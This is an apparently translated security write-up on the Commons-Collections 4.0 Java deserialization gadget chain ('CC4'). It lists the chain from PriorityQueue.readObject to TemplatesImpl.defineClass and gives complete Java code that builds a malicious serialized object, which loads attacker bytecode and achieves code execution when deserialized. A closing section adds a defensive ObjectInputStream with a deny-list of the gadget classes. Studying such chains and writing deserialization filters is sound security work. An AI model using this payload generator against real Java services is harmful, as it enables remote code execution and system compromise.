CC4
Reference: https://www.cnblogs.com/1vxyz/p/17473641.html
Environment: jdk8u65 && Commons-collections 4.0
In CommonsCollections4, every version other than 4.0 has an InvokerTransformer that no longer implements Serializable.
TransformingComparator, however, does implement Serializable, and Commons-collections 3 does not have it.
The sink of the CC4 chain is again defineClass loading the malicious class, so the second half can be carried over from CC3.
For the first half we look for a caller of transform(), and end up inside PriorityQueue.
The chain is as follows:
```
Gadget chain:
    PriorityQueue::readObject()
    -> PriorityQueue::heapify()
    -> PriorityQueue::siftDown()
    -> PriorityQueue::siftDownUsingComparator()
    -> TransformingComparator::compare()
    -> ChainedTransformer::transform()
    -> ConstantTransformer::transform()
    -> InstantiateTransformer::transform()
    -> TrAXFilter::TrAXFilter()
    -> TemplatesImpl::newTransformer()
    -> TemplatesImpl::getTransletInstance()
    -> TemplatesImpl::defineTransletClasses()
    -> TransletClassLoader::defineClass()
```
Following the chain, there is only one thing to work out:

We need to enter the loop that triggers siftDown(), but the initial size is 0, so two more elements have to be added to the queue for the loop to run.
Here I tried setFieldValue(priorityQueue,"size",2);
and it loads the malicious class as well.
If add() is used instead, the chain must not fire already while the serialized data is being built, so a ConstantTransformer is put in first as a placeholder.
The payload is as follows:
```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class cc4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        // Sink (same as CC3): TemplatesImpl.newTransformer() ends in defineClass() on the bytes in _bytecodes
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "jed");
        byte[] code = Files.readAllBytes(Paths.get("target/classes/evil.class"));
        byte[][] codes = {code};
        setFieldValue(templates, "_bytecodes", codes);
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        // new TrAXFilter(templates) calls templates.newTransformer()
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        // Placeholder transformer so that add() does not fire the chain while the payload is being built
        TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2); // size must be >= 2 so that heapify() -> siftDown() runs inside readObject()

        // Swap in the real chain only after both elements are in the queue
        setFieldValue(transformingComparator, "transformer", chainedTransformer);

        serialize(priorityQueue);
        unserialize("sercc4.bin");
    }

    public static void setFieldValue(Object object, String field_name, Object filed_value) throws NoSuchFieldException, IllegalAccessException {
        Class clazz = object.getClass();
        Field declaredField = clazz.getDeclaredField(field_name);
        declaredField.setAccessible(true);
        declaredField.set(object, filed_value);
    }

    public static void serialize(Object obj) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("sercc4.bin"))) {
            oos.writeObject(obj);
        }
    }

    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }
}
```
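As an added defensive example (not code from the original post), the following ObjectInputStream subclass refuses to resolve the classes the chain above relies on; jdk8u65 predates ObjectInputFilter (8u121+), so overriding resolveClass() is the portable way to enforce such a policy. The class name GadgetRejectingObjectInputStream and the deny-list contents are assumptions drawn from the gadget chain on this page.

```java
import java.io.*;
import java.util.Arrays;
import java.util.List;
import java.util.PriorityQueue;

// Added example, not from the original post: an ObjectInputStream that refuses to
// resolve the classes this CC4 chain depends on. jdk8u65 predates ObjectInputFilter
// (added in 8u121), so overriding resolveClass() is the portable way to enforce the policy.
public class GadgetRejectingObjectInputStream extends ObjectInputStream {
    // Hypothetical deny-list built from the chain above; extend it for your own code base.
    static final List<String> DENIED_PREFIXES = Arrays.asList(
            "org.apache.commons.collections4.functors.",   // ChainedTransformer, ConstantTransformer, InstantiateTransformer
            "org.apache.commons.collections4.comparators.TransformingComparator",
            "org.apache.commons.collections.",             // CC3 functors share the same sink
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");

    public GadgetRejectingObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    // Policy check on the class name found in the stream's class descriptor.
    public static boolean isAllowed(String className) {
        for (String prefix : DENIED_PREFIXES) {
            if (className.startsWith(prefix)) return false;
        }
        return true;
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        if (!isAllowed(desc.getName())) {
            // Thrown before super.resolveClass() loads the class, so no gadget readObject() ever runs.
            throw new InvalidClassException(desc.getName(), "class rejected by deserialization policy");
        }
        return super.resolveClass(desc);
    }

    public static void main(String[] args) throws Exception {
        // Benign round-trip: a PriorityQueue of Integers carries no comparator class at all.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new PriorityQueue<>(Arrays.asList(3, 1, 2)));
        }
        try (ObjectInputStream ois = new GadgetRejectingObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            System.out.println("benign queue head: " + ((PriorityQueue<?>) ois.readObject()).peek());
        }
        System.out.println("TransformingComparator allowed: " + isAllowed("org.apache.commons.collections4.comparators.TransformingComparator"));
    }
}
```

A deny-list only covers the gadgets you already know about; where the set of legitimate serialized types is small, invert the check into an allow-list and reject everything else.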